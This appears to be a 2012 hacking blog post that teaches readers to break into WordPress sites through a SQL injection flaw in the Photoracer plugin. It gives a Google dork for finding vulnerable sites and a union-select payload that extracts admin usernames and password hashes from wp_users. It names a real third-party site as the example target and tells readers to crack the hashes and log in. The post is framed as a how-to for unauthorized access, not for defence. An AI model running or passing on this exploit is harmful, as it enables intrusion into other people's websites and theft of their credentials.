Banner 468 x 60px

LikeViews

Thursday, 12 January 2012

Simplest way to hack any Wordpress based site

Comments
In this post I'll tell you the SIMPLEST WAY TO HACK ANY WORDPRESS BASED SITE.



First we'll use this dork to search website with the help of Google

inurl:"wp-content/plugins/photoracer/viewimg.php?id="


Results: 


I'm now gonna test one of them..

For eg..

http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=2 

Now add the Exploit..

/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--
This is the exploit.. (GIVEN ABOVE)

And now the site address will become..

http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--


Now you can see the ADMIN and PASS....just crack the HASHES and you're done..

Site Admin Login page for WP
http://www.SITE-ADDRESS/wp-login.php
 
Convex Coders © 2011 Convex-Coders. Supported by Code 104 and tech PANELS